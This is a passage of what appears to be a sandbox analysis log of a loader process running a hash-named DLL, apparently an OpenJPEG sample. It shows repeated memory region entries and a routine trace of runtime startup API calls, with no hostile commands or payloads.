= 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8328 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8329 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8330 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8331 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8332 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8333 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8334 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8335 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8336 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8337 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8338 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8339 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8340 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8341 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8342 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8343 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8344 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8345 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8346 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8347 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8348 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8349 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8350 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8351 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8352 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8353 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8354 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8355 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8356 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8357 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8358 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8359 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8406 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8407 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8408 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8409 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8410 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8411 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8412 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8413 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8414 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8415 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 177 os_tid = 0xd28 [0155.817] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.817] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0155.817] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.817] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0155.817] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0155.818] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.818] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0155.818] GetProcessHeap () returned 0x580000 [0155.818] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.818] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0155.819] GetLastError () returned 0x7e [0155.819] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0155.819] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0155.819] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c8) returned 0x58c320 [0155.819] SetLastError (dwErrCode=0x7e) [0155.819] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1200) returned 0x593470 [0155.821] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0155.821] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.821] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0155.821] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.821] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec" [0155.821] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec" [0155.822] GetACP () returned 0x4e4 [0155.822] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x228) returned 0x585380 [0155.822] IsValidCodePage (CodePage=0x4e4) returned 1 [0155.822] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0155.822] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0155.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0155.822] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0155.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0155.822] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.822] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0155.822] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0155.822] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0155.822] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0155.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0155.822] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0155.823] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0155.823] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x100) returned 0x591b10 [0155.823] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x176) returned 0x589aa0 [0155.823] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0155.823] GetLastError () returned 0x0 [0155.823] SetLastError (dwErrCode=0x0) [0155.823] GetEnvironmentStringsW () returned 0x594680* [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9cc) returned 0x595060 [0155.823] FreeEnvironmentStringsW (penv=0x594680) returned 1 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x118) returned 0x58a590 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3e) returned 0x590900 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x5c) returned 0x580780 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x62) returned 0x584c00 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x78) returned 0x58c6f0 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x62) returned 0x585a40 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x28) returned 0x58b980 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x48) returned 0x5902c0 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1a) returned 0x58b530 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3a) returned 0x590c70 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x62) returned 0x584510 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2a) returned 0x58c770 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x584c70 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1c) returned 0x58b6b0 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xd2) returned 0x585cd0 [0155.823] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x7c) returned 0x584000 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3a) returned 0x590ae0 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x90) returned 0x583c20 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x58b8c0 